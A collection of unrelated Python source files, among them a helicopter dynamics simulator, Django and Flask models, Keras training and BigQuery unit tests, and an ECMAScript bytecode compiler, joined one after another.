uvw_dot = body_acc - cross_product(pqr, uvw)
pqr_dot = self.HELI['IINV']@(moment_total - cross_product(pqr, self.HELI['I']@pqr))
xyz_dot = ned_vel
### State derivatives
state_dots['vi_mr'] = vi_mr_dot
state_dots['vi_tr'] = vi_tr_dot
state_dots['psi_mr'] = psi_mr_dot
state_dots['psi_tr'] = psi_tr_dot
state_dots['betas'] = betas_dot
state_dots['uvw'] = uvw_dot
state_dots['pqr'] = pqr_dot
state_dots['euler'] = euler_dot
state_dots['xyz'] = xyz_dot
if set_observation:
### Observation calculations
power_total_hp = power_total/550 # [hp] Power consumption in Horse Power
#tas = np.linalg.norm(uvw_air) # true air speed in ft/s
#sideslip_deg = R2D*np.arcsin(uvw_air[1]/(tas+EPS))# [deg] Sideslip angle
#aoa_deg = R2D*np.arctan2(uvw_air[2], (uvw_air[0]+EPS)) # [deg] % Angle of Attack
alt_gr = -xyz[2] - self.__get_ground_height_from_hmap()
# These two are not need for now.
#ground_speed = np.linalg.norm(ned_vel[:2]) # [ft/s] Ground speed
#track_angle_deg = R2D*np.arctan2(ned_vel[1],ned_vel[0]) # [deg] Track angle
self.observation = np.array([power_total_hp, \
uvw_air[0], uvw_air[1], uvw_air[2], \
ned_vel[0], ned_vel[1], ned_vel[2], \
euler[0], euler[1], euler[2], \
pqr[0], pqr[1], pqr[2],
xyz[0], xyz[1], -xyz[2], alt_gr],
)
#print(20*"-")
#print(f"{t1-t0}\n{t2-t1}\n{t3-t2}\n{t4-t3}\n{t5-t4}\n{t6-t5}\n{t7-t6}\n{t8-t7}\n{t9-t8}\n{t10-t9}\n{t11-t10}\n{t12-t11}\n{t13-t12}\n{t14-t13}\n{t15-t14}\n{t16-t15}\n**************************")
#print(t16-t0)
return state_dots
def trim(self, params):
"""This function trims the helicopter given the parameters.
If necessary, user can specify velocity of helicopter in earth frame along with
yaw_rate which should be deg/sec. Other parameters like rotor azimuths, yaw angle and
north east locations and ground altitude can also be specified.
"""
# First, fix some parameters which are not iterated through trim algorithm.
# However, these parameters will affect the trim.
self.state['euler'][-1] = params["yaw"]
self.state['psi_mr'][0] = params["psi_mr"]
self.state['psi_tr'][0] = params["psi_tr"]
self.state['xyz'][0] = params["xy"][0]
self.state['xyz'][1] = params["xy"][1]
cg_from_bottom = -self.ground_touching_altitude()
self.state['xyz'][2] = cg_from_bottom-params["gr_alt"]
self.last_action = np.zeros(4)
n_vars = 16
y_target = np.zeros(n_vars, dtype=np.float)
y_target[-4] = params['yaw_rate']
y_target[-3:] = np.array(params['ned_vel'], dtype=FLOAT_TYPE)/self.MR['R']
uvw0 = np.array(params['ned_vel'], dtype=FLOAT_TYPE)/self.MR['V_TIP']
x = np.array([0.05, 0.05, 0, 0, # vi_mr, vi_tr, betas
uvw0[-3], uvw0[-2], uvw0[-1], # uvw
0, 0, y_target[-4], # pqr
-0.01, 0.01, # phi, theta
0.0, 0.0, 0.0, 0.0, # actions
], dtype=np.float)
y = self.__trim_fcn(x)
tol = (y-y_target).transpose()@(y-y_target)
s_time = time.perf_counter()
while tol>EPS:
dydx = []
for i in range(n_vars):
dxi = np.zeros(n_vars); dxi[i]+=EPS
dydxi = (self.__trim_fcn(x+dxi)-self.__trim_fcn(x-dxi))/(2*EPS)
dydx.append(dydxi)
dydx = np.stack(dydx, axis=-1)
step_dir = np.linalg.inv(dydx)@(y-y_target)
step_size = 1.0
for j in range(10):
x_new = x - step_size*step_dir # candidate new step
y_new = self.__trim_fcn(x_new)
tol_new = (y_new-y_target).transpose()@(y_new-y_target)
step_size *= 0.5
if tol_new < tol: break
if j==9: break
x, y, tol = x_new, y_new, tol_new
if (time.perf_counter() - s_time) > 5.0:
assert False, "Trim failed, please try a better trim condition!"
# Finalize the trim algorithm by assigning solved states to the system.
self.state['vi_mr'] = x[0:1]*self.MR['V_TIP']
self.state['vi_tr'] = x[1:2]*self.TR['V_TIP']
self.state['betas'] = x[2:4]
self.state['uvw'] = x[4:7]*self.MR['V_TIP']
self.state['pqr'] = x[7:10]*self.MR['OMEGA']
self.state['euler'][:-1] = x[10:12]
self.last_action = x[12:16]
# set state dots
self.state_dots = self.dynamics(self.state, self.last_action, set_observation=True)
def __trim_fcn(self, x):
state = copy.deepcopy(self.state)
state['vi_mr'] = x[0:1]*self.MR['V_TIP']
state['vi_tr'] = x[1:2]*self.TR['V_TIP']
state['betas'] = x[2:4]
state['uvw'] = x[4:7]*self.MR['V_TIP']
state['pqr'] = x[7:10]*self.MR['OMEGA']
state['euler'][:-1] = x[10:12]
action = x[12:16]
state_dots = self.dynamics(state, action)
y = np.concatenate([state_dots['vi_mr']/self.MR['V_TIP'],
state_dots['vi_tr']/self.TR['V_TIP'],
state_dots['betas'],
state_dots['uvw']/self.MR['V_TIP'],
state_dots['pqr']/self.MR['OMEGA'],
state_dots['euler'],
state_dots['xyz']/self.MR['R']])
return y
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-03-16 19:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('threads', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Followers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=100, verbose_name='User Name')),
('follower', models.CharField(max_length=100, verbose_name='User Name')),
],
),
migrations.CreateModel(
name='Questions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.CharField(max_length=100, verbose_name='Question')),
('user_name', models.CharField(max_length=100, verbose_name='User Name')),
('posted', models.DateTimeField(auto_now_add=True)),
('domain', models.CharField(max_length=100, verbose_name='Domain')),
],
options={
'verbose_name_plural': 'Questions',
'verbose_name': 'Questions',
},
),
migrations.CreateModel(
name='Replies',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_id', models.IntegerField()),
('posted', models.DateTimeField(auto_now_add=True)),
('rank', models.IntegerField()),
('reply', models.CharField(max_length=100, verbose_name='Reply')),
('votes', models.IntegerField()),
('domain', models.CharField(max_length=100, verbose_name='Domain')),
],
options={
'verbose_name_plural': 'Replies',
'verbose_name': 'Replies',
},
),
migrations.CreateModel(
name='Requests',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=100, verbose_name='User Name')),
('requestor', models.CharField(max_length=100, verbose_name='User Name')),
],
),
migrations.CreateModel(
name='ThreadReplies',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('reply_id', models.IntegerField()),
('reply', models.CharField(max_length=100, verbose_name='Reply')),
('votes', models.IntegerField()),
('rank', models.IntegerField()),
('posted', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name_plural': 'Thread Replies',
'verbose_name': 'Thread Replies',
},
),
migrations.AddField(
model_name='profile',
name='score',
field=models.IntegerField(default=0),
preserve_default=False,
),
migrations.AlterField(
model_name='profile',
name='email_id',
field=models.EmailField(max_length=254),
),
]
|
import pandas as pd
import pickle
import numpy as np
import sys
df = pd.read_csv("imageLinksWithAgeAndGender.csv")
print(df.shape)
df['age' ] = df['age'].loc[df['age'].str.len() ==2]
df['age'] = df['age'].fillna(0)
strs = df['age'].value_counts()
pos = strs.loc[df['age'].value_counts() > 10]
pos = pos.index.tolist()
df['age'] = df['age'].loc[df['age'].isin(pos)]
df['age'].dropna(inplace=True)
df['ageInt'] = df['age'].astype(int)
select = df['ageInt'].loc[(df['ageInt'] > 15) & (df['ageInt'] < 80) & (df['ageInt'] != np.inf) & (df['ageInt'] != -np.inf)]
print(select.shape)
age = df['ageInt'][select]
indexes = select.index.values
images = df['imagePath'][indexes]
ages = {}
trainImages = open(sys.argv[1]).readlines()
trainImages = [image.strip().split('/')[-1] for image in trainImages]
for i in range(len(indexes)):
image = df['imagePath'][indexes[i]].split('/')[-1]
if image in trainImages:
ages[image] = df['ageInt'][indexes[i]]
pickle.dump(ages, open("ages.pkl", "wb"))
|
import requests
import uuid
def test_crop_validation(hostname, large_file):
"""
Test edge cases of cropping an image
:param hostname: The hostname under test (this fixture is automatically injected by pytest)
:param large_file: A large-ish filename (this fixture is automatically injected by pytest)
"""
with open(large_file, 'r') as f:
resp = requests.post(hostname + '/images',
data={'user_id': 'test-user-{}'.format(uuid.uuid4())},
files={'file': ('bridge.jpeg', f)})
img_id = resp.json()['id']
bad_payloads = (
{'action': 'crop', 'box': '50'},
{'action': 'crop', 'box': ''},
{'action': 'crop', 'size': '20,20'}
)
for bad_payload in bad_payloads:
resp = requests.put(hostname + '/image/{}'.format(img_id), data=bad_payload)
assert resp.status_code == 400, 'Request should have failed but did not with payload: {}'.format(bad_payload)
assert resp.json()['description'].startswith('Invalid bounding box')
# Clean up test data and delete the image
requests.delete(hostname + '/image/{}'.format(img_id))
|
# led-control WS2812B LED Controller Server
# Copyright 2021 jackw01. Released under the MIT License (see LICENSE for details).
import re
import math
import colorsys
# Constrain value
def clamp(x, min, max):
if x < min:
return min
elif x > max:
return max
else:
return x
# Title generation
def camel_to_title(text):
return re.sub(r'((?<=[a-z])[A-Z]|(?<!\A)[A-Z](?=[a-z]))', r' \1', text)
def snake_to_title(text):
return text.replace('_', ' ').title()
# Misc shaping functions
# Exponential asymmetric impulse function - peaks at t=1
# See http://www.iquilezles.org/www/articles/functions/functions.htm
def impulse_exp(t):
return t * math.exp(1 - t)
# Equivalent to GLSL fract - returns the floating point component of a number
def fract(x):
return x - math.floor(x)
|
from __future__ import print_function
from spyder_window_maker import win_ftset_and_label
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import keras
import tensorflow as tf
import numpy as np
import scipy.io as sio
import cv2
import os
import time
batch_size = 128
num_classes = 3
epochs = 50
start_point = 49
window_size = 3
# input image dimensions
img_rows, img_cols = 2*window_size+1, 2*window_size+1
img_num = [0, 7, 18, 33, 43, 58]
mat_contents = sio.loadmat('mum-perf-org-new-1-60.mat')
y = mat_contents['B'][0][0][0][0]
img = mat_contents['B'][0][2][0][0]
y[y == 4] = 1
class_mat = y[start_point:start_point+201, start_point:start_point+201]
img_cut = img[start_point:start_point+201, start_point:start_point+201]
x_train, y_train, x_test, y_test, x_, y_, label_x = win_ftset_and_label(img, img_cut, class_mat
, test_size=.1, win_size=window_size
, win_tyoe='window_square'
, class_num=num_classes)
# the data, split between train and test sets
# (x_train, y_train), (x_test, y_test) = mnist.load_data()
print(x_train.shape[0], 'train samples')
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# # convert class vectors to binary class matrices
# y_train = keras.utils.to_categorical(y_train, num_classes)
# y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(8, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1]) |
import itertools
class Players:
def __init__(self):
self._players = set()
self.reset()
def reset(self):
self.player_queue = itertools.cycle(self._players)
def add(self, player):
self._players.add(player)
self.reset()
def remove(self, player):
self._players.remove(player)
self.reset()
def next(self):
return self.player_queue.next()
if __name__ == "__main__":
p = Players()
p.add(1)
p.add(2)
p.add(3)
p.add(8)
for _ in range(10):
print p.next()
p.remove(3)
for _ in range(10):
print p.next()
|
import logging
log = logging.getLogger(__name__)
class BalanceBase:
def __init__(self, dataDict):
self.dataDict = dataDict
def _getCommonInitialData(self):
balances = self.dataDict['initialBalances']
returnDict = {
'accruedInterest': balances['accruedInterest'],
'cash_available_for_trading': balances['cashAvailableForTrading'],
'cash_balance': balances['cashBalance'],
'bond_value': balances['bondValue'],
'cash_receipts': balances['cashReceipts'],
'liquidation_value': balances['liquidationValue'],
'long_option_market_value': balances['longOptionMarketValue'],
'long_stock_value': balances['longStockValue'],
'money_market_fund': balances['moneyMarketFund'],
'mutual_fund_value': balances['mutualFundValue'],
'short_option_market_value': balances['shortOptionMarkeyValue'],
'short_stock_value': balances['shortStockValue'],
'is_in_call': balances['isInCall'],
'pending_deposits': balances['pendingDeposits'],
'account_value': balances['accountValue'],
}
return returnDict
def _getCommonCurrentData(self):
balances = self.dataDict['currentBalances']
returnDict = {
'accruedInterest': balances['accruedInterest'],
'cash_balance': balances['cashBalance'],
'bond_value': balances['bondValue'],
'cash_receipts': balances['cashReceipts'],
'liquidation_value': balances['liquidationValue'],
'long_option_market_value': balances['longOptionMarketValue'],
'long_market_value': balances['longStockValue'],
'money_market_fund': balances['moneyMarketFund'],
'mutual_fund_value': balances['mutualFundValue'],
'short_option_market_value': balances['shortOptionMarkeyValue'],
'short_market_value': balances['shortStockValue'],
'pending_deposits': balances['pendingDeposits'],
'savings': balances['savings']
}
class CashInitialBalancesParse(BalanceBase):
def __init__(self, dataDict):
super().__init__(dataDict)
self.dataDict = dataDict
self.commonData = self._getCommonInitialData()
def _getData(self):
self.commonData.update({
'cash_available_for_withdrawal': self.dataDict['initalBalances']['cashAvailableForWithdrawal'],
'unsettled_cash': self.dataDict['initalBalances']['unsettledCash'],
'cash_debit_call_value': self.dataDict['initalBalances']['cashDebitCallValue']
})
class CashCurrentBalancesParse(BalanceBase):
def __init__(self, dataDict):
super().__init__(dataDict)
self.dataDict = dataDict
self.commonData = self._getCommonCurrentData()
def _getData(self):
self.commonData.update({
'cash_available_for_trading': self.dataDict['currentBalances']['cashAvailableForTrading'],
'cash_available_for_withdrawal': self.dataDict['currentBalances']['cashAvailableForWithdrawal'],
'cash_call': self.dataDict['currentBalances']['cashCall'],
'long_non_marginable_market_value': self.dataDict['currentBalances']['longNonMarginableMarketValue'],
'total_cash': self.dataDict['currentBalances']['totalCash'],
'cash_debit_call_value': self.dataDict['currentBalances']['cashDebitCallValue'],
'unsettled_cash': self.dataDict['currentBalances']['unsettledCash']
})
class CashProjectedBalancesParse:
def __init__(self, dataDict):
self.dataDict = dataDict
class MarginInitialBalancesParse(BalanceBase):
def __init__(self, dataDict):
super().__init__(dataDict)
self.dataDict = dataDict
self.commonData = self._getCommonInitialData()
def _getData(self):
self.commonData.update({
'available_funds_non_marginable_trade': self.dataDict['initialBalances']['availableFundsNonMarginableTrade'],
'buying_power': self.dataDict['initialBalances']['buyingPower'],
'day_trading_power': self.dataDict['initialBalances']['dayTradingPower'],
'day_trading_buying_power_call': self.dataDict['initialBalances']['dayTradingBuyingPowerCall'],
'day_trading_equity_call': self.dataDict['initialBalances']['dayTradingEquityCall'],
'equity': self.dataDict['initialBalances']['equity'],
'equity_percentage': self.dataDict['initialBalances']['equityPercentage'],
'long_margin_value': self.dataDict['initialBalances']['longMarginValue'],
'maintenance_call': self.dataDict['initialBalances']['maintenanceCall'],
'maintenance_requirement': self.dataDict['initialBalances']['maintenanceRequirement'],
'margin': self.dataDict['initialBalances']['margin'],
'margin_equity': self.dataDict['initialBalances']['marginEquity'],
'reg_t_call': self.dataDict['initialBalances']['regTCall'],
'short_margin_value': self.dataDict['initialBalances']['shortMarginValue'],
'total_cash': self.dataDict['initialBalances']['totalCash'],
'margin_balance': self.dataDict['initialBalances']['marginBalance']
})
class MarginCurrentBalancesParse(BalanceBase):
def __init__(self, dataDict):
super().__init__(dataDict)
self.dataDict = dataDict
self.commonData = self._getCommonCurrentData()
def _getData(self):
self.commonData.update({
'available_funds': self.dataDict['currentBalances']['availableFunds'],
'available_funds_non_marginable_trade': self.dataDict['currentBalances']['availableFunds'],
'buying_power': self.dataDict['currentBalances']['buyingPower'],
'buying_power_non_marginable_trade': self.dataDict['currentBalances']['buyingPowerNonMarginableTrade'],
'day_trading_buying_power': self.dataDict['currentBalances']['dayTradingBuyingPower'],
'equity': self.dataDict['currentBalances']['equity'],
'equity_percentage': self.dataDict['currentBalances']['equityPercentage'],
'long_margin_value': self.dataDict['currentBalances']['longMarginValue'],
'maintenance_call': self.dataDict['currentBalances']['maintenanceCall'],
'maintenance_requirement': self.dataDict['currentBalances']['maintenanceRequirement'],
'margin_balance': self.dataDict['currentBalances']['marginBalance'],
'reg_t_call': self.dataDict['currentBalances']['regTCall'],
'short_balance': self.dataDict['currentBalances']['shortBalance'],
'short_margin_value': self.dataDict['currentBalances']['shortMarginValue'],
'sma': self.dataDict['currentBalances']['sma']
})
class MarginProjectedBalancesParse:
def __init__(self, dataDict):
self.dataDict = dataDict
|
from django.views.generic import TemplateView
# Create your views here.
from core.models import Post
class HomeView(TemplateView):
template_name = 'home.html'
def get_context_data(self, **kwargs):
context = super(HomeView, self).get_context_data(**kwargs)
context['posts'] = Post.objects.all().filter(
is_published=True
).order_by("published_at")[:10]
return context
|
import requests
from adhack.settings import GODADDY_KEY, GODADDY_SECRET, GODADDY_API
def check_domain(name):
"""
r = requests.get(GODADDY_API+name, headers={
"Accept": "application/json",
"Authorization": "sso-key {}:{}".format(
GODADDY_KEY,
GODADDY_SECRET
)
})
"""
return True
|
import unittest
from google.appengine.ext import testbed, ndb
from mock import patch
from src.commons.big_query.copy_job_async.copy_job.copy_job_request \
import CopyJobRequest
from src.commons.big_query.copy_job_async.copy_job_service_async \
import CopyJobServiceAsync
from src.commons.big_query.copy_job_async.post_copy_action_request \
import PostCopyActionRequest
from src.commons.big_query.copy_job_async.task_creator \
import TaskCreator
from src.commons.big_query.big_query import BigQuery
from src.commons.big_query.big_query_table import BigQueryTable
class TestCopyJobServiceAsync(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
ndb.get_context().clear_cache()
patch('googleapiclient.discovery.build').start()
patch(
'oauth2client.client.GoogleCredentials.get_application_default') \
.start()
def tearDown(self):
patch.stopall()
self.testbed.deactivate()
def create_example_target_bq_table(self):
return BigQueryTable("target_project_id_1",
"target_dataset_id_1",
"target_table_id_1")
def create_example_source_bq_table(self):
return BigQueryTable("source_project_id_1",
"source_dataset_id_1",
"source_table_id_1")
@patch.object(BigQuery, 'insert_job', return_value="job_id_123")
@patch.object(TaskCreator, 'create_copy_job')
def test_that_queue_task_was_invoked_with_default_retry_count_value(
self, create_copy_job, _):
# given
# when
CopyJobServiceAsync(
copy_job_type_id="test-process",
task_name_suffix="example_sufix"
).copy_table(
self.create_example_source_bq_table(),
self.create_example_target_bq_table()
)
# then
expected_retry_count = 0
create_copy_job.assert_called_once_with(
CopyJobRequest(
task_name_suffix="example_sufix",
copy_job_type_id="test-process",
source_big_query_table=(self.create_example_source_bq_table()),
target_big_query_table=(self.create_example_target_bq_table()),
create_disposition="CREATE_IF_NEEDED",
write_disposition="WRITE_EMPTY",
retry_count=expected_retry_count
)
)
@patch.object(TaskCreator, 'create_copy_job')
def test_that_post_copy_action_request_is_passed(
self, create_copy_job):
# given
post_copy_action_request = \
PostCopyActionRequest(url="/my/url", data={"key1": "value1"})
# when
CopyJobServiceAsync(
copy_job_type_id="test-process",
task_name_suffix="example_sufix"
).with_post_action(
post_copy_action_request
).copy_table(
self.create_example_source_bq_table(),
self.create_example_target_bq_table()
)
# then
create_copy_job.assert_called_once_with(
CopyJobRequest(
task_name_suffix="example_sufix",
copy_job_type_id="test-process",
source_big_query_table=(self.create_example_source_bq_table()),
target_big_query_table=(self.create_example_target_bq_table()),
create_disposition="CREATE_IF_NEEDED",
write_disposition="WRITE_EMPTY",
retry_count=0,
post_copy_action_request=post_copy_action_request
)
)
@patch.object(TaskCreator, 'create_copy_job')
def test_that_create_and_write_disposition_are_passed_if_specified(
self, create_copy_job):
# given
create_dispositon = "SOME_CREATE_DISPOSITON"
write_dispostion = "SOME_WRITE_DISPOSTION"
# when
CopyJobServiceAsync(
copy_job_type_id="test-process",
task_name_suffix="example_sufix"
)\
.with_create_disposition(create_dispositon)\
.with_write_disposition(write_dispostion)\
.copy_table(
self.create_example_source_bq_table(),
self.create_example_target_bq_table()
)
# then
create_copy_job.assert_called_once_with(
CopyJobRequest(
task_name_suffix="example_sufix",
copy_job_type_id="test-process",
source_big_query_table=(self.create_example_source_bq_table()),
target_big_query_table=(self.create_example_target_bq_table()),
create_disposition=create_dispositon,
write_disposition=write_dispostion,
retry_count=0,
post_copy_action_request=None
)
)
def test_that_assertion_erro_if_no_type_provided(self):
with self.assertRaises(AssertionError) as error:
CopyJobServiceAsync(
copy_job_type_id=None,
task_name_suffix="example_sufix"
).copy_table(None, None)
self.assertEqual(error.exception.message, "copy_job_type_id needs to be assigned in constructor")
def test_that_assertion_error_if_no_task_name_suffix_provided(self):
with self.assertRaises(AssertionError) as error:
CopyJobServiceAsync(
copy_job_type_id="test-process",
task_name_suffix=None
).copy_table(None, None)
self.assertEqual(error.exception.message, "task_name_suffix needs to be assigned in constructor")
|
# -*- coding: utf-8 -*-
from app import db, login
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
def __repr__(self):
return '<User {}>'. format(self.username)
@login.user_loader
def load_user(id):
return User.query.get(int(id))
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
#invoice_statement = db.Table('mn_invoice_statement',
# db.Column('invoice_id', db.Integer, db.ForeignKey('pkvinvoice.id'), primary_key=True),
# db.Column('insurance_statement_id', db.Integer, db.ForeignKey('insurance_statement.id'), primary_key=True)
#)
class PKVInvoice(db.Model):
__tablename__= "pkvinvoice"
id = db.Column(db.Integer, primary_key=True)
#patient = db.Column(db.String(64), index=True, nullable=False)
invoice_date = db.Column(db.Date)
due_date = db.Column(db.Date)
#drs = db.Column(db.Integer, db.ForeignKey('doctor.id'), nullable=False)
amount = db.Column(db.Float)
comment = db.Column(db.String(250))
informed_me = db.Column(db.String())
# sent_to_pkv = db.Column(db.Boolean)
sent_at = db.Column(db.Date, nullable=True)
# paid = db.Column(db.Boolean)
paid_at = db.Column(db.Date, nullable=True)
# repaid = db.Column(db.Boolean)
repaid_at = db.Column(db.Date, nullable=True)
state = db.Column(db.String(16))
patient_id = db.Column(db.Integer, db.ForeignKey('patients.id'))
statement_id = db.Column(db.Integer, db.ForeignKey('insurance_statement.id'), nullable=True)
def __repr__(self):
return '<Invoice {}-{}>'.format(self.invoice_date, self.patient_id )
class Insurance_statement(db.Model):
__tablename__= "insurance_statement"
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime)
amount_repaid = db.Column(db.Float)
invoices = db.relationship('PKVInvoice', backref='statement ', lazy=True)
def __repr__(self):
return '<Invoice {}>'.format(self.date)
class Patients(db.Model):
__tablename = 'patients'
id = db.Column(db.Integer, primary_key=True)
patient = db.Column(db.String(64), index=True, nullable=False)
invoices = db.relationship('PKVInvoice', backref='patient', lazy=True)
def __init__(self, name):
self.patient = name
def __repr__(self):
return '<Patient %s>' % self.name
class SelfPaid(db.Model):
id = db.Column(db.Integer, primary_key=True)
year = db.Column(db.Integer)
amount = db.Column(db.Float)
|
#Generated from java-escape by ANTLR 4.4
import antlr4
import Utils
import ECMAScriptParser
from VirtualMachine.OpCode import OpCode
from VirtualMachine.Code import Code
from VirtualMachine.Instruction import Instruction
from VirtualMachine.Stack import Stack
from ECMAScriptParser import ECMAScriptVisitor
from Interpreter.Console import Console
from Interpreter.Math import MathModule
from Interpreter.Environment import Environment
from Interpreter.Function import Function
from Interpreter.Object import Object, ObjectModule
from Interpreter.Property import Property
def printCtx(ctx, level=14, tab="", path="ctx"):
if 1==2:
num = -1;
if (ctx.children != None):
print(tab,"list of ", ctx.getChildCount(), "")
for c in ctx.children:
num = num + 1
path_ = path + " " + str(num) +" -"# ".children[" + str(num) + "]"
if(isinstance(c, antlr4.tree.Tree.TerminalNodeImpl)):
print(tab, path_, " is ", c.symbol.text)
else:
print(tab, path_, " is list ->")
if (level > 0):
printCtx(c, level-1, tab + " ", path_)
else:
print(tab, "children: ", c)
print("")
def sPrintCtx(ctx):
num = -1;
if (ctx.children != None):
for c in ctx.children:
num = num + 1
path_ = "ctx.children[" + str(num) + "]"
if(isinstance(c, antlr4.tree.Tree.TerminalNodeImpl)):
print(path_, " is ", c.symbol.text)
else:
print(path_, " is ", c)
print("")
def dprint(*string):
if 1==2:
for s in string:
print(s, end="")
print(" ", end="")
# def console(value):
# print(value)
# This class defines a complete generic visitor for a parse tree produced by ECMAScriptParser.
class BytecodeVisitor(ECMAScriptVisitor):
def __init__(self, program):
self.program = program
self.lineno = 0
self.tmpStack = Stack();
def add_instruction(self, opcode, *arguments):
inst = Instruction(opcode, *arguments)
dprint("add_instruction:", self.lineno, ":", opcode, arguments)
self.lineno = self.lineno + 1
self.program.add_instruction(inst)
return inst
AV_IDENTIFIER = 0
AV_MEMBERDOT = 1
AV_INDICE = 2
def visitTerminal(self, node):
txt = "visitTerminal " + node.symbol.text
dprint(txt)
return node.symbol.text
# Visit a parse tree produced by ECMAScriptParser#ArgumentsExpression.
def visitArgumentsExpression(self, ctx):
dprint("visitArugmentsExpression")
#ordering is important!
#many accepts do stuff on the stack for you!
args = ctx.children[1].accept(self)
linebefore = self.program.current_index()
this = ctx.children[0].children[0].accept(self) #accetp returns nothing but pushes to stack if "this" exists. If it does not exist it returns something...
lineafter = self.program.current_index()
args = args + 1
if linebefore == lineafter:
self.add_instruction(OpCode.PUSH, None)
func = ctx.children[0].accept(self)
self.add_instruction(OpCode.CALL, args)
# Visit a parse tree produced by ECMAScriptParser#elementList.
def visitElementList(self, ctx):
dprint("visitElementList")
i = 0
for child in ctx.children:
value = child.accept(self)
if not value == ",":
i = i + 1
self.add_instruction(OpCode.MAKE_ARRAY, i)
# Visit a parse tree produced by ECMAScriptParser#ForInStatement.
def visitForInStatement(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#emptyStatement.
def visitEmptyStatement(self, ctx):
dprint("visitEmptyStatement")
pass
# Visit a parse tree produced by ECMAScriptParser#NewExpression.
def visitNewExpression(self, ctx):
dprint("visitNewExpression")
nrOfParams = ctx.children[2].accept(self) #() - params
ctx.children[1].accept(self) #Object
self.add_instruction(OpCode.NEW, nrOfParams)
# Visit a parse tree produced by ECMAScriptParser#MemberDotExpression.
def visitMemberDotExpression(self, ctx):
dprint("visitMemberDotExpression")
obj = ctx.children[0].accept(self)
member = ctx.children[2].accept(self)
# on top of stack we have obj
self.add_instruction(OpCode.LOAD_MEMBER, member)
# Visit a parse tree produced by ECMAScriptParser#tryStatement.
def visitTryStatement(self, ctx):
dprint("visitTryStatement")
catchAddr = 1337
finallyAddr = 1338
TRYPUSHAddr = self.program.current_index()
self.add_instruction(OpCode.TRY_PUSH, catchAddr)
ctx.children[1].accept(self) # code to run
JMPAddr = self.program.current_index()
self.add_instruction(OpCode.JMP, finallyAddr)
catchAddr = self.program.current_index()
self.program.modify_instruction_arg(TRYPUSHAddr, catchAddr)
ctx.children[2].accept(self) #catch code to run
#fix text to print thing
finallyAddr = self.program.current_index()
self.program.modify_instruction_arg(JMPAddr, finallyAddr)
# finally
if ctx.getChildCount() == 4:
ctx.children[3].accept(self) #code to run
# Visit a parse tree produced by ECMAScriptParser#DoStatement.
def visitDoStatement(self, ctx):
dprint("visitDoStatement")
# [0] = do, [1] = block, [2] = while, [3] = (, [4] = condition, [5] = )
# run the do-block once
doStart = self.program.current_index()
ctx.children[1].accept(self)
# check condition and rerun do if needed
ctx.children[4].accept(self) # True/False value pused to stack
self.add_instruction(OpCode.IFJMP, doStart)
# Visit a parse tree produced by ECMAScriptParser#WhileStatement.
def visitWhileStatement(self, ctx):
dprint("visitWhileStatement")
#self.add_instruction(OpCode.POP_TO_VAL, exceptionAddr)
tmpStackSize = self.tmpStack.size()
# check condition and jump over if false
placeholderAddr = 1337
whileStart = self.program.current_index()
ctx.children[2].accept(self) # True/False value paused to stack
unlessJmpAddr = self.program.current_index()
self.add_instruction(OpCode.UNLESSJMP, placeholderAddr)
# code to run
ctx.children[4].accept(self)
self.add_instruction(OpCode.JMP, whileStart)
exitWhileAddr = self.program.current_index()
# used to find out how many breaks and continues have been added in between
tmpJumpsAdded = self.tmpStack.size() - tmpStackSize
for i in range(tmpJumpsAdded):
jump = self.tmpStack.pop()
addr = self.program.get_instruction_arg(jump)
addr = addr[0]
if (addr == 6000): #a break
self.program.modify_instruction_arg(jump, exitWhileAddr)
pass
elif (addr == 7000): #a continue
self.program.modify_instruction_arg(jump, whileStart)
else:
pass
#ShouldNotHappenException
self.program.modify_instruction_arg(unlessJmpAddr, exitWhileAddr)
# Visit a parse tree produced by ECMAScriptParser#returnStatement.
def visitReturnStatement(self, ctx):
dprint("visitReturnStatement")
ctx.children[1].accept(self)
self.add_instruction(OpCode.RET)
# Visit a parse tree produced by ECMAScriptParser#switchStatement.
def visitSwitchStatement(self, ctx):
dprint("visitSwitchStatement")
ctx.children[2].accept(self) # variable pushes itself onto the stack
